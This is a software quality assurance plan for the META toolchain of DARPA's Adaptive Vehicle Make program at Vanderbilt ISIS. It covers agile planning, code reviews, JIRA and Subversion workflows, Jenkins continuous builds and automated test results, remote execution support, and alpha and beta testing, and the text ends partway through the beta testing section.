  - 1.2 Scope
- 2. Applicability
- 3. Applicable Documents
  - 3.1 Contract Level Documents
  - 3.2 ISIS Governing Documents
  - 3.3 Reference Documents
- 4. Program Management, Planning and Environment
  - 4.1 The META SQA Plan
  - 4.2 Organization
  - 4.3 Task Planning
  - 4.4 Software Personnel Training
    - 4.4.1 SQA Personnel
    - 4.4.2 Software Developer Training Certification
    - 4.4.3 META Project Management
  - 4.5 Tools and Environment
- 5. SQA Program Requirements
  - 5.1 User Threads as Requirements
  - 5.2 Innovation and Improvement
  - 5.3 Program Resources Allocation Monitoring
  - 5.4 Best Practices of Software Development
  - 5.5 Inspections
  - 5.6 Test Case Management
  - 5.7 Defect Reports and Change Requests
  - 5.8 Software and Project Document Deliverables
  - 5.9 Requirements Traceability
  - 5.10 Software Development Process
  - 5.11 Project Reviews
    - 5.11.1 Formal Reviews
    - 5.11.2 Informal Reviews
  - 5.12 Test Benches
  - 5.13 Software Configuration Management
  - 5.14 Release Procedures and Software Configuration Management
  - 5.15 Change Control
  - 5.16 Problem Reporting
  - 5.17 Continuous Build
  - 5.18 Services and Resources Provided to AVM
  - 5.19 Software Testing
    - 5.19.1 Unit Test
    - 5.19.2 Integration Test
    - 5.19.3 Alpha Testing
    - 5.19.4 Beta Testing
    - 5.19.5 Gamma Test
  - 5.20 META Release Schedule
  - 5.21 Quality Metrics
- 6. Appendix
  - 6.1 Coding Documentation Requirements
  - 6.2 Testing Requirements
  - 6.3 Inspection and Code Review Guidance
  - 6.4 Sample Checklist

## List of Figures

- Figure 1: META Team Organization
- Figure 2: Spiral Development Cycle
- Figure 3: Internal Development/Testing Cycle
- Figure 4: High Level Architecture Integration View
- Figure 5: JIRA Issue Summary page for META
- Figure 6: Beta Testing Issue Reporting (Beta.VehicleFORGE.org)
- Figure 7: Jenkins interface showing the status of the META development branch
- Figure 8: Installer Acceptance Test Checklist
- Figure 9: Core CyPhy Tools Test Checklist
- Figure 10: Core Test Bench Functionality Checklist
- Figure 11: 2014 META Release Schedule

## List of Tables

- Table 1: AVM Tools at the End of Gamma Testing
- Table 2: Automated Tests

## 1. Introduction

### 1.1 Purpose

The purpose of this Software Quality Assurance Plan (SQAP) is to define the techniques, procedures, and methodologies that will be used at the Vanderbilt University Institute for Software-Integrated Systems (ISIS) to ensure timely delivery of software that implements the META portion of the Defense Advanced Research Projects Agency (DARPA) Adaptive Vehicle Make (AVM) program.
### 1.2 Scope

Use of this plan will help assure the following:

1. That software development, evaluation and acceptance standards appropriate for the META program interfaces to the AVM software are developed, documented and followed.
2. That the results of software quality reviews and audits will be available for META program management and AVM program managers to support development, testing, and integration decisions.
3. That important characteristics of the META program affecting quality, maintainability, and stability are documented for potential partners and customers.

## 2. Applicability

The SQAP covers quality assurance activities throughout all development phases of the DARPA AVM Meta project. This plan represents efforts beginning at the end of the FANG-I program through the remainder of the Meta tool development. While many pieces of the SQAP can be generalized to other ISIS software projects, the DARPA AVM program has unique requirements that require specialized attention and limit our ability to conduct a traditional QA process. The following list outlines some aspects of the AVM program related to our QA process.

- Research focused – The products generated at ISIS are typically cutting-edge research products. These efforts involve technology that has not been developed before, so much of the software is produced by exploration or prototyping.
- Agile development is the approach we are following. Requirements are light. Interfaces are defined as needed in consultation with our partners. User threads provide details of the required functionality. Integration testing is where the bulk of the integration and user requirements are focused.
- Changing requirements – Our process is designed to be adaptive as requirements change and evolve.

As the program matures and final products for delivery are assembled, the focus of the SQAP shifts in the following ways:

- R&D is no longer a driver. Maturing existing functionality and ensuring effective integration with team contributions is more important.
- Agile development continues with more focus on complete, seamless execution of user threads.
- No new requirements are anticipated; rather fixing, testing, and validating the goals of the user threads is the key point.

## 3. Applicable Documents

The following documents can be used as requirements for the design and manufacture of ACIS software and form a part of this document to the extent specified herein. The issue in effect at the time of contract award shall apply unless otherwise listed below.

### 3.1 Contract Level Documents

META Contract and associated Contract Data Requirements List

### 3.2 ISIS Governing Documents

None applicable

### 3.3 Reference Documents

## 4. Program Management, Planning and Environment

As the only management-level document that is a META program deliverable, the SQAP also documents the basic management and planning functions performed in META.

### 4.1 The META SQA Plan

The META SQA plan is developed to provide the META PM with the tools to deliver a robust product for use by industry partners, AVM teammates, and other DARPA/NASA projects. Data collection of metrics that characterize the software product and its quality is central to achieving that goal. Program management and development staff must understand what the metrics mean and take action accordingly. A portion of the project management discipline is expended to review project metrics to ensure the actions taken accomplished the intended results. Finally, the metrics collection, including defect burn-down, is an important component of the final delivered open source project.

### 4.2 Organization

The organization within ISIS is a project-focused R&D activity. Aside from the PIs, there is little in the way of hierarchic structure. QA is not a diffuse activity, however, since it remains a major accountability of the project management team. The team’s organization structure is depicted in Figure 1.
### 4.3 Task Planning

Since the META program is being developed as an agile project, tasks are organized by a time box. Typically each spiral is about 4 weeks with 3 sprints (major week-long iterations) and a final week for focused integration. Since the software is being continuously tested, the metrics are available on a weekly basis and reviewed on a monthly basis as part of the release decision process.

The Meta development plan is organized into four-week “sprints” as depicted in Figure 2: Spiral Development Cycle. At the end of each sprint, a new version of the CyPhy-Meta tool is released to the test community. These four-week sprints are divided into two phases: feature development and stabilization. The feature development phase is when the primary work of designing and implementing new features takes place. The stabilization phase emphasizes deeper testing, as well as the preparation of documentation for internal and external purposes, including BETA test scripts, example and test models, and software architecture documentation.

The Spiral Development Cycle diagram depicts the relationship between META team development cycles and BETA testing cycles. While the META team prepares release R+1, the BETA testing group is working with the previous release R+0. Once the META sprint for R+1 has completed, the tools are released to the BETA team for testing, while the Meta team moves on to R+2. During BETA testing of R+1, META tool updates will only be provided for issues that significantly block the testing process. While the next version of the tools is being developed, the previous version is released to beta test. Figure 3 outlines the internal development cycle.

Each development group is responsible for collecting their own metrics and using them for planning their work. At the transition between sprints and in dealings with external partners, the project management team is responsible for identifying weaknesses based on the metrics.
### 4.4 Software Personnel Training

#### 4.4.1 SQA Personnel

No training of SQA personnel is anticipated, as the person tasked is the author of the SQA plan and also the project manager for META.

#### 4.4.2 Software Developer Training Certification

Each member of the software development team has recent software engineering coursework, including SQA. Project leads responsible for the largest chunks of META code have industry knowledge of code standards and quality assurance techniques. No certification is required.

#### 4.4.3 META Project Management

The techniques and metrics identified in this document are evolving and should be used based on experience and gap analysis when QA levels are perceived to be dropping. The document provides an organizing framework for collecting and analyzing the data so management can take action and follow up to verify results are in line with projections.

### 4.5 Tools and Environment

The high-level architecture showing the relationships between the Model Integration, Tool Integration and Execution Integration platforms is depicted in Figure 4.

Figure 4: High Level Architecture Integration View

META generates tools for the design, exploration, specification, simulation, testing and manufacturing of complex, reliable, robust systems. It also relies upon software tools for development, synthesis, testing, analysis and reporting functions. The META toolchain entries listed in Table 1 are current as of the end of Post Gamma.
<table> <thead> <tr> <th>Tool or Model</th> <th>Current Version</th> <th>Dependencies (other tools and models)</th> <th>Notes (criticality, test tools, etc)</th> </tr> </thead> <tbody> <tr> <td>GME</td> <td>14.3.5</td> <td></td> <td></td> </tr> <tr> <td>Python</td> <td>2.7.6</td> <td></td> <td></td> </tr> <tr> <td>Open Meta-CyPhy</td> <td>14.03.25913</td> <td>GME, Java, Python</td> <td></td> </tr> <tr> <td>Java</td> <td>7.0.550</td> <td>Meta-Link</td> <td></td> </tr> <tr> <td>Dymola</td> <td>14.0.294</td> <td>Dynamics</td> <td></td> </tr> <tr> <td>ProE</td> <td>Creo 2.0 M070</td> <td>CAD</td> <td></td> </tr> <tr> <td>OpenModelica</td> <td>1.9.1Beta2</td> <td>Dynamics</td> <td></td> </tr> <tr> <td>OpenFOAM</td> <td>2.2.0</td> <td>CFD</td> <td></td> </tr> <tr> <td>Abaqus</td> <td>6.13-1</td> <td>FEA</td> <td></td> </tr> <tr> <td>Nastran</td> <td>2013.1</td> <td>FEA</td> <td></td> </tr> <tr> <td>SwRI AVM Tools</td> <td>42</td> <td>GME, Open Meta-CyPhy, LS-Dyna</td> <td>Blast/Ballistics</td> </tr> <tr> <td>LS-PrePost</td> <td>4.1</td> <td>Blast</td> <td></td> </tr> <tr> <td>LS-Dyna</td> <td>7 (rev. 
79055)</td> <td>Blast</td> <td></td> </tr>
<tr> <td>CTH</td> <td>10.3</td> <td>Ballistics</td> <td></td> </tr>
<tr> <td>ForgePort</td> <td>0.6.10.0</td> <td>GME, Open Meta-CyPhy</td> <td>VF tool</td> </tr>
<tr> <td>PSU-MAAT</td> <td>1.0.33</td> <td></td> <td>TDP editor</td> </tr>
<tr> <td>PSU-HuDAT</td> <td>1.0.8</td> <td>Creo</td> <td></td> </tr>
<tr> <td>PSU-RAMD</td> <td>2.2</td> <td></td> <td></td> </tr>
<tr> <td>Mayavi</td> <td>4.3.1</td> <td>wxPython 2.8, configobj, Envisage</td> <td>FOV</td> </tr>
<tr> <td>C2M2L Modelica Lib</td> <td>R2838</td> <td></td> <td></td> </tr>
<tr> <td>C2M2L Lib</td> <td>11</td> <td></td> <td></td> </tr>
<tr> <td>Seed Model</td> <td>RC9</td> <td></td> <td></td> </tr>
<tr> <td>FEA Seed</td> <td>6.4</td> <td></td> <td></td> </tr>
<tr> <td>Comp Spec</td> <td>2.5</td> <td></td> <td></td> </tr>
</tbody> </table>

Table 1: AVM Tools at the End of Gamma Testing

## 5. SQA Program Requirements

This section defines the SQA review, reporting, and auditing procedures used at VU/ISIS to ensure that internal and external software deliverables are developed in accordance with this plan and contract requirements. Internal deliverables are items that are produced by software development and then integrated with project builds using configuration control procedures. External deliverables are items that are produced for delivery to the META community. These include scheduled program releases and final configuration deliverables.

### 5.1 User Threads as Requirements

During spiral planning, user threads to accomplish significant, complex, chained tasks are defined. These provide insight to developers and testers about the intended use of META. Test cases are defined by external organizations (Beta testers and other AVM contractors) to examine the META behavior in completing the user thread activities. Each release has identified user threads as its major content.
### 5.2 Innovation and Improvement

ISIS, as a learning organization, has a practice of analyzing current conditions to seek improvement, a structured approach for implementing changes on a small scale that can be measured, and a forum for broadcasting those changes and the results to the broader community. Innovation is important to upgrade processes and integrate appropriate technology. The ISIS approach to innovation is to collect data to confirm where more effort is spent than value is generated. Using group discussions, different approaches to process change, tool addition, computer resources or other avenues are selected for a pilot test. Once improvement is noticed, the change is propagated to other groups.

### 5.3 Program Resources Allocation Monitoring

Program resources that are planned and monitored include personnel, computer systems, and software licenses. At the start of each spiral, personnel are assigned to development and test teams. Institutional computer systems are assumed for the development life cycle. Software license needs may change for a variety of reasons, but adjustments are made to ensure the delivered configurations will operate with the appropriate software licenses.

### 5.4 Best Practices of Software Development

A sample of the practices that ISIS has applied to its agile development process to increase the quality of final products is listed below. Some of these approaches are a result of either process improvement activities or innovation.

Two sets of eyes on every change is a general principle followed during development. Pair programming, peer (code) reviews and commit reviews are all procedures used in order to follow this principle.

Pair programming is used occasionally to ensure that code is inspected by two people and knowledge is distributed within the team. This method works best in non-routine tasks (e.g. writing new code or debugging a complex algorithm), and sessions should not last for more than 4 hours.
Pair programming is also a good practice for quickly bringing junior team members on board.

Peer code reviews are conducted to verify that the developed code is of good quality, implements the desired functionality, and will integrate well. While code reviews help achieve these goals, they do not substitute for testing and other QA processes.

Commit reviews are done by a dedicated person who merges (integrates) the code. During this procedure the person screens the changes before merging them into the repository main (release) branch.

Feature design documentation and reviews are recommended to ensure that the implementation will fulfill the requirements and that developers working on the same feature have a common understanding of the problem and the proposed solution. Before implementing a feature, team members should discuss it and write a 1-3 page document, which is informally reviewed and accepted as the baseline for the work to be done.

Automated tools for executing (code) tests and static code analysis are in place. Automated test execution tools run tests as part of the continuous integration process. The tests are executed each time a change is integrated into the release branch. The test results are accessible through a web interface. In case of a test failure, the person(s) who made the change are automatically informed via email. This allows immediate discovery of code breakages.

Static code analysis is performed on the source code to ensure adherence to coding style and standards and to detect bad practices. The static code analysis is executed by the build system for each build. These results are checked periodically by the developers; any significant concerns are reviewed in greater detail.

5.5 Inspections

During each sprint within a spiral, code and design are informally reviewed within the development team. These results are often captured informally in the team leaders' notes.
Prior to final delivery, a plan is generated by the project manager to identify the highest-impact and highest-risk modules for latent defects in the scheduled final delivery. These modules should be the subject of a formal design and code review. Recommended changes should be analyzed for likely impact on earlier deliveries.

The first step is an analysis of the JIRA database and Beta test results to find the most common types of defects. This list is part of the code review package. Second, the principal engineer for the modules under review provides annotations on what has changed, what test cases have changed to accommodate the code change, and whether any downstream dependencies have been identified. Third, the review team and chair are selected. A date and time should be set for the review, with guidance on its length taken from the appendix on Review and Inspection Guidance. Once the review is complete, the team lead and the principal engineer should list all actions to be taken, identify latent defects, and identify additional testing as necessary. The final review team report should include the closeout of actions, testing, and defect removal and analysis.

5.6 Test Case Management

Test cases are developed for both unit testing and thread testing. Unit test cases should be run successfully before spiral integration. Thread test cases should be run during Beta Testing. The results of these test cases are used to define the META capabilities for each release. The META Project Manager maintains a RYG status board of test bench status and META thread capability status for each delivery. Typically these status charts are presented at the PI meetings or other venues for the META user community.

5.7 Defect Reports and Change Requests

Defects in the delivered products are documented by the open tickets generated by the Beta Test Team. Internally discovered defects are tracked in the JIRA database.
The most important metrics for management and reporting are:

1. Defect Rate: analyzed for module occurrence density, defect source, and time to closure.
2. Defect Insertion Ratio: the rate of defects introduced as a result of fixes to other defects. This analysis includes the source, missed opportunities to find or prevent the defect, and the time to discover it after insertion.
3. Failure Interval: a valuable metric for measuring improvement in stability.

5.8 Software and Project Document Deliverables

The META Project Manager is responsible for reviewing deliverable software documentation, including the META Final Report. Review checklists will be used to review these documents. These reviews help ensure that documentation is in compliance with applicable contract instructions. Final Report software documentation should include R&D results as well as product documentation. Important contents include: User Thread definitions and their status; user documentation for build, execution, and test; and a High Level System Architecture Diagram describing the vision and details of the architecture to the development team. Software documentation must be based on a published convention such as those found in the IEEE Software Engineering Standards. Source code commenting requirements should be spelled out in an appropriate appendix. Both software documentation and comments are covered in code reviews.

5.9 Requirements Traceability

Traceability is identified through the use of a spreadsheet matrix which ties individual Contract End Item (CEI) deliverables and document entries to lower-level entries. These traceability products are produced and maintained by the project manager.

5.10 Software Development Process

The META program is developed using an agile process. Control over spiral and sprint content is established by consensus of the development team and its customers in the META/AVM community at kick-off meetings each month.
The project manager and team leads review progress during the month and evaluate test results, execution notes, and other teammates' analyses at the end of the period in build release decisions.

5.11 Project Reviews

5.11.1 Formal Reviews

Given the R&D nature of the project and the agile method of development, formal reviews are minimized. Almost all decisions are the result of informal meetings or telecons with the extended AVM/META team.

5.11.2 Informal Reviews

Where a module interfaces with components generated by other organizations, an informal design review is held with all organizations affected. The project manager or team lead will ensure all action items generated during this review process are identified and tracked during development. The project management team is responsible for ensuring all action items have been closed.

5.11.2.1 Code Walk-throughs

Because of the wide range of languages and tools for auto-generated code, code reviews should be tailored based on recent experience with the languages and toolsets used. It is also important to highlight the change history and defect history of the modules under review. Eventually, enough review history will build up that bug classes will become important to consider.

5.11.2.2 Baseline Quality Reviews

This review ensures: (1) that the code has been tested and meets module specifications, except as noted; (2) that any changes to applicable software module design documents have been identified; (3) that appropriate validation tests have been run; (4) that the functionality of the baseline is documented; (5) that all software design documentation complies with this plan; and (6) that the tools and techniques used to produce and validate the Software Sub-System are identified and controlled.

5.12 Test Benches

Test benches represent environment inputs and composed models connected to a range of testing and verification tools for key performance parameters.
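As a rough code picture of such a test bench — an illustration of the concept only, not the actual CyPhy model format; all field names, metrics, and values below are made up:

```python
from dataclasses import dataclass, field

@dataclass
class TestBench:
    workflow: list          # which analysis tools run, and in what order
    system_under_test: str  # the user design(s) being evaluated
    environment: dict       # analysis-specific environment inputs
    metrics: dict = field(default_factory=dict)  # metrics of interest, filled by the run

    def evaluate(self, requirements):
        """Compare computed metrics against per-metric (min, max) bounds.
        A missing metric compares as NaN, which fails both bounds."""
        return {name: lo <= self.metrics.get(name, float("nan")) <= hi
                for name, (lo, hi) in requirements.items()}

bench = TestBench(
    workflow=["modelica_dynamics"],
    system_under_test="design_A",
    environment={"terrain": "gravel", "payload_kg": 1000},
    metrics={"top_speed_kph": 72.0},
)
verdict = bench.evaluate({"top_speed_kph": (60.0, 120.0)})
```

The point of the structure is the one stressed in the text: the environment and workflow are authored once, and only `system_under_test` changes between design evaluations.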
Test benches work by composing user designs and executing them in the environment specified in the Test Bench. Tests can range from Finite Element Analysis in the thermal and structural domains, to multi-domain analysis using the Modelica language, to manufacturing cost and lead time analysis. The major components of a Test Bench are the workflow definition, which defines which analysis tools should be used; the top-level system under test, which defines the user design(s) to be tested; the environment inputs, which are specific to each type of analysis; and the metrics of interest, which are used to compare designs against a set of requirements for that design.

Test benches offer users the ability to rapidly compose designs for a variety of different analyses from one source model. The goal of this design is to allow users to create a virtual test environment once and run numerous designs through it without having to manually set up each individual design. This also ensures that each design is subjected to the same environment, allowing the best possible comparison of designs. Ultimately the goal is that users spend less time setting up analyses and more time analyzing results to design the best possible product for the requirements.

Another goal of Test Benches is to enable rapid response to changing requirements of a design. Again, instead of manually setting up one of a number of designs in a new environment to assess designs against new requirements, users can modify a few parameters in the Test Bench and begin the analysis of the designs with the updated environment in a matter of minutes instead of days.

5.13 Software Configuration Management

Software configuration management is the progressive, controlled definition of the shape and form of the software deliverables.
It integrates the technical and administrative actions of identifying, documenting, changing, controlling, and recording the functional characteristics of a software product throughout its life cycle. It also controls changes proposed to these characteristics. As the software product proceeds through requirements, analysis, implementation, test, and acceptance, the programs to be identified are specified in the SDP. This assurance process occurs during the Baseline Quality Review mentioned above, as the configuration becomes progressively more definite, precise, and controlled. Software configuration management is an integral part of the project configuration management, using the same procedures for identification and change control that are used for documents, engineering drawings, test verification procedures, etc.

5.14 Release Procedures and Software Configuration Management

The need for control increases in proportion to the number of individuals that use the products of software development. As a result, different control procedures will be used depending on use. The ISIS software configuration management process revolves around the disciplined use of two tools: a software version-control system (Subversion) and a ticket-based tracking system (JIRA). Figure 5 presents an issue summary page from JIRA, which is typically reviewed while making work or release decisions.

All development tasks are tracked in the JIRA system. Each sprint is associated with a future software release version, with these versions making up the milestones used within the system. All development tasks are tracked with JIRA tickets, including new features, improvements, refactoring, and correction of defects. Each ticket includes a "Target Version," marked either with an upcoming milestone or with a "backlog" tag. All work for a given ticket typically occurs in a Subversion branch dedicated only to that task.
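The "Target Version" bookkeeping just described amounts to grouping tickets by milestone, with backlog items held aside. A minimal sketch — the ticket shape and IDs are illustrative, not the real JIRA schema:

```python
def milestone_contents(tickets):
    """Group tickets by Target Version; 'backlog'-tagged tickets are
    held separately from the upcoming release milestones."""
    milestones, backlog = {}, []
    for t in tickets:
        if t["target"] == "backlog":
            backlog.append(t["id"])
        else:
            milestones.setdefault(t["target"], []).append(t["id"])
    return milestones, backlog

milestones, backlog = milestone_contents([
    {"id": "META-101", "target": "13.18"},   # hypothetical ticket IDs
    {"id": "META-102", "target": "13.18"},
    {"id": "META-103", "target": "backlog"},
])
```

Each milestone's list then corresponds to the dedicated Subversion branches expected to be merged for that release.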
Once the task is completed and has passed alpha testing, the code changes are scheduled to be merged into the relevant software release lines. These dedicated branches create a clear definition of the changes related to a specific issue, allowing the team to reliably apply or remove them on the correct software release versions based on changing conditions, or defer changes to future sprints. Branches are merged during a weekly "Merge Day". On this day, all completed tasks are merged to the relevant software release lines. The Subversion repository and the JIRA system are also reviewed for inconsistencies, which are corrected if necessary.

5.15 Change Control

Change control for software begins during the integration phase and must start when software identified with a numeric release is given to someone outside of software development for use in their work.

5.16 Problem Reporting

The Meta team tracks tasks and reports bugs internally using the previously mentioned JIRA system. Bugs found through informal reviews and unit testing are reported by the developers in JIRA directly. Bugs identified through Beta testing are reported by the test community into the VehicleFORGE (VF) ticket tracking system, depicted in Figure 6. When an issue is verified, the ISIS support team creates a JIRA task based on the VF ticket. This process filters out "bugs" related to user error, inadequate documentation, etc.

![Image: Beta Testing Issue Reporting (Beta.VehicleFORGE.org)](image)

**Figure 6: Beta Testing Issue Reporting (Beta.VehicleFORGE.org)**

5.17 Continuous Build

The ISIS Meta project utilizes an automated build and testing system to track our tool development. The build and test system, Jenkins\(^1\), is an open source continuous integration tool. Jenkins is written in Java and is a web-based platform. We have deployed an NUnit plugin to enhance our testing capabilities. This process maximizes the level of working software during our development process.
Each build is triggered by a developer's repository check-in.

---

\(^1\) [http://jenkins-ci.org/](http://jenkins-ci.org/)

The Jenkins system regularly, after every source code change in our version control system, compiles the Meta tools as they are being developed. Builds that do not compile can be diagnosed, with fixes merged into the appropriate build. Figure 7 presents a Jenkins Status Page.

The following list outlines the automated test battery that all newly committed code is tested against. Note that there are several tests within each category; the number of tests in each category is listed in Table 2 below. Builds that do not pass the test battery cannot be merged into the main development branch.

<table> <thead> <tr> <th>Package</th> <th>Total Tests</th> <th>Pass</th> <th>Skip</th> <th>Fail</th> <th>Duration</th> <th>Package</th> </tr> </thead> <tbody> <tr> <td>CADTeamTest</td> <td>17</td> <td>17</td> <td>0</td> <td>0</td> <td>41 sec</td> <td></td> </tr> <tr> <td>ComponentAndArchitectureTeamTest</td> <td>25</td> <td>25</td> <td>0</td> <td>0</td> <td>3.7 sec</td> <td>ComponentAndArchitectureTeamTest</td> </tr> <tr> <td>ComponentExporterUnitTests</td> <td>10</td> <td>10</td> <td>0</td> <td>0</td> <td>29 sec</td> <td>ComponentExporterUnitTests</td> </tr> <tr> <td>ComponentImporterUnitTests</td> <td>12</td> <td>12</td> <td>0</td> <td>0</td> <td>1 min 4 sec</td> <td>ComponentImporterUnitTests</td> </tr> <tr> <td>ComponentInterchangeTest</td> <td>47</td> <td>47</td> <td>0</td> <td>0</td> <td>1 min 56 sec</td> <td>ComponentInterchangeTest</td> </tr> <tr> <td>ComponentLibraryManagerTest</td> <td>20</td> <td>20</td> <td>0</td> <td>0</td> <td>5.6 sec</td> <td>ComponentLibraryManagerTest</td> </tr> <tr> <td>CyPhyPropagateTest</td> <td>14</td> <td>14</td> <td>0</td> <td>0</td> <td>52 sec</td> <td>CyPhyPropagateTest</td> </tr> <tr> <td>CyberTeamTest</td> <td>1</td> <td>1</td> <td>0</td> <td>0</td> <td>0.16 sec</td> <td>CyberTeamTest</td> </tr> <tr>
<td>CyberTeamTest.Projects</td> <td>3</td> <td>3</td> <td>0</td> <td>0</td> <td>1.2 sec</td> <td>CyberTeamTest.Projects</td> </tr> <tr> <td>DesignExporterUnitTests</td> <td>24</td> <td>24</td> <td>0</td> <td>0</td> <td>49 sec</td> <td>DesignExporterUnitTests</td> </tr> <tr> <td>DesignImporterTests</td> <td>9</td> <td>9</td> <td>0</td> <td>0</td> <td>4.9 sec</td> <td>DesignImporterTests</td> </tr> <tr> <td>DesignSpaceTest</td> <td>5</td> <td>5</td> <td>0</td> <td>0</td> <td>2.3 sec</td> <td>DesignSpaceTest</td> </tr> <tr> <td>DynamicsTeamTest</td> <td>1</td> <td>1</td> <td>0</td> <td>0</td> <td>0.99 sec</td> <td>DynamicsTeamTest</td> </tr> <tr> <td>DynamicsTeamTest.Projects</td> <td>266</td> <td>266</td> <td>0</td> <td>0</td> <td>2 min 17 sec</td> <td>DynamicsTeamTest.Projects</td> </tr> <tr> <td>ElaboratorTest</td> <td>59</td> <td>59</td> <td>0</td> <td>0</td> <td>38 sec</td> <td>ElaboratorTest</td> </tr> <tr> <td>MasterInterpreterTest.Projects</td> <td>214</td> <td>214</td> <td>0</td> <td>0</td> <td>1 min 57 sec</td> <td>MasterInterpreterTest.Projects</td> </tr> <tr> <td>MasterInterpreterTest.UnitTests</td> <td>6</td> <td>6</td> <td>0</td> <td>0</td> <td>3.1 sec</td> <td>MasterInterpreterTest.UnitTests</td> </tr> <tr> <td>ModelTest</td> <td>1</td> <td>1</td> <td>0</td> <td>0</td> <td>1.1 sec</td> <td>ModelTest</td> </tr> <tr> <td>PythonTest</td> <td>1</td> <td>1</td> <td>0</td> <td>0</td> <td>1 sec</td> <td>PythonTest</td> </tr> </tbody> </table> Table 2: Automated Tests 5.18 Services and Resources Provided to AVM ISIS will configure and maintain a remote execution service to provide execution of Meta Test Benches for the Gamma Test period and pre-test period testing. 
ISIS will, under this contract, manage and maintain the following items:

- Installation and configuration of the Meta Job Execution Server (*Jenkins*)
- Installation and configuration of Meta CyPhy Software installers and dependencies
- Installation and configuration of 3rd Party Software necessary for Gamma Test Remote Execution.

Note that the physical computational resources will be provided by ISIS. Currently 160 VMs and 20 physical machines have been allocated as remote processing nodes for the Gamma period. The Meta remote processing nodes use the virtual machine environment provided by VehicleFORGE.

- Installation and configuration of the Meta Job Server (*Jenkins*)

The Meta Job Server will need to be updated when the CyPhy software is updated, to reflect the proper CyPhy version numbers, etc., so that the remote jobs are routed to the correct job servers.

- Installation and configuration of Meta CyPhy Software distributions

The Meta CyPhy software will be updated on the dates in the schedule below, as well as any other times Meta CyPhy software updates are released to the Gamma Test community.

- November 27, 2013 - Meta 13.18 Install
- December 10, 2013 - Meta 13.19 Install
- January 6, 2014 - Meta 14.01 Install
- January 13, 2014 - Meta 14.01 Final Install following jury period.
- January 27 - May 15, 2014 - Gamma updates as needed.
- ~ March 28, 2014 - Mid Gamma Content Upgrade.

- Installation and configuration of 3rd Party Software necessary for Gamma Test

The third-party software necessary for the Gamma Test falls into two categories:

● Software from AVM performers
● Commercial Software.
AVM Performer Software:

● SwRI Blast Tools**
● SwRI Ballistics Tools**
● SwRI Corrosion Tools*
● Ricardo Python Based Tools*
● PSU/iFAB Detailed Analysis tool configuration (analysis is performed on PSU resources)
● iFAB Conceptual Analysis Tool*
● iFAB Structural Analysis Tool
● iFAB RAM-D Analysis Tool**

*Local Execution  **Local and Remote

COTS Software:

● Creo CAD Software**
● LS-DYNA (Livermore Software Technology Corporation)
● CTH Impact Simulation Software (Sandia National Laboratories)
● OpenFOAM for CFD computations
● Abaqus for FEA computation
● Dymola for Dynamics computation

**Local and Remote

Remote Processing Node Support Plan

ISIS will be actively available to support Gamma participants during Central/Eastern time zone business hours. During the Gamma period, ISIS will perform assessments of the remote processing infrastructure. If resources are judged to be insufficient, more resources will be allocated from VehicleFORGE. Long-term solutions to inefficiencies, job failures, and node allocation will be considered during these weekly assessments. In the event of job failures, the necessary remote personnel will prioritize the resolution above other tasks to ensure a timely fix. Assessments will take place weekly on Thursdays from 2–3pm Central.

5.19 Software Testing

5.19.1 Unit Test

All code will be unit tested to ensure that the individual unit (class) performs the required functions and outputs the proper results and data. Proper results are determined by using the design limits of the calling (client) function as specified in the design specification defining the called (server) function. Unit testing is typically white-box testing and may require the use of software stubs and symbolic debuggers. This testing helps ensure proper operation of a module because tests are generated with knowledge of the internal workings of the module.

5.19.2 Integration Test

There are two levels of integration testing.
One level is the process of testing a software capability. During this level, each module is treated as a black box, while conflicts between functions or classes and between software and appropriate hardware are resolved. Integration testing requirements are shown in Attachment 2. Test cases must provide unexpected parameter values when design documentation does not explicitly specify calling requirements for client functions. A second level of integration testing occurs when sufficient modules have been integrated to demonstrate a scenario or user thread.

5.19.3 Alpha Testing

Once a developer has completed a new feature, improvement, major bug fix, or development task, a package or zip of installers and documentation is assembled. The documentation includes a background description, user tool instructions, and any other notes. These are then sent to multiple internal ISIS alpha testers for testing.

Alpha testers will first address the specific software update that has been implemented in the tools, using the latest installer. If the alpha tester is able to successfully complete the task, they will notify the developer and then proceed to testing the other core Meta GUI and Test Bench features. A standard checklist is used by the alpha tester to sign off on the core tools. This process ensures that the new code implementation did not negatively affect other core Meta features. An example of this checklist is seen in Figure 8.

If an alpha tester is unable to successfully test the new feature, the tester records the issues in a JIRA ticket and links it to the developer's original ticket. The issues seen can include software errors, documentation or instruction errors, or a new error in the core Meta tools that was not occurring in a previous version. Once the developer fixes the issue, the alpha tester installs the new version of the tools and re-tests the feature and core tools using the same or updated documentation.
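The sign-off decision from such a checklist reduces to "every core item functions properly". A sketch, with hypothetical checklist items standing in for the actual form:

```python
def alpha_signoff(checklist):
    """Sign off only when every core item functions properly; otherwise
    return the items that would each need a JIRA ticket."""
    failing = [item for item, ok in checklist.items() if not ok]
    return (len(failing) == 0), failing

# Illustrative pass/fail states, not a real alpha test run
ok, failing = alpha_signoff({
    "Component Importer": True,
    "Master Interpreter": True,
    "Meta-Link": False,   # this would be recorded against the developer's ticket
})
```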
A Meta version is not released until two copies of the alpha sign-off form shown below are filled out, stating successful results.

**5.19.4 Beta Testing**

Once there is alpha sign-off on the new tool or feature, as well as sign-off on the corresponding Meta tool version, all of the required items are prepped to be sent out for beta testing. The beta testing process is seen in the diagram below:

The beta testing cycle begins with the tool installer and documentation being released and posted to the beta community on the VehicleFORGE resource page. Once everything is posted, the testers send an email with a brief summary of what has been released. URL links are also included in the email for each of the following:

- **Tool installers**: Tool installers such as an updated Open Meta-CyPhy version, HuDAT, SwRI tool, etc.
- **Meta-CyPhy Release Notes**: These list the latest new features, improvements, bug fixes, or tasks that were implemented in the Open Meta-CyPhy version. Release notes for an updated sub-version will be the same as those of the version it originated from, but with highlighted items indicating what is new in the sub-version. For example, the 14.03.2 release notes will be the same as 14.03.1, except for the new items, which are highlighted in the notes.
- **New tool or feature overview and user instructions**: This documentation will contain all pertinent information necessary for testers to understand and use the tool. The sections in this document are the purpose, procedures, installation notes, tool background, requirements tested (Test Bench document), theory of operation, instructions for use, metrics, troubleshooting, and future enhancements.
- **Specific testing instructions**: These instructions are written in a "task" through VehicleFORGE's ticket system. Tasks usually include brief background context and instructions for testing. Tasks will sometimes be assigned to testers depending on what needs to be tested.
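The sub-version highlighting rule above (e.g. 14.03.2 versus 14.03.1) amounts to a list difference. A minimal sketch; the note entries are invented examples:

```python
def highlight_new_items(previous_notes, current_notes):
    """Items present in the new sub-version's notes but not in the
    version it originated from; these are the entries to highlight."""
    return [item for item in current_notes if item not in previous_notes]

# Hypothetical release-note entries
notes_14_03_1 = ["Fix component importer crash", "New PCC options"]
notes_14_03_2 = ["Fix component importer crash", "New PCC options",
                 "Fix Test Bench remote execution"]
new_items = highlight_new_items(notes_14_03_1, notes_14_03_2)
```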
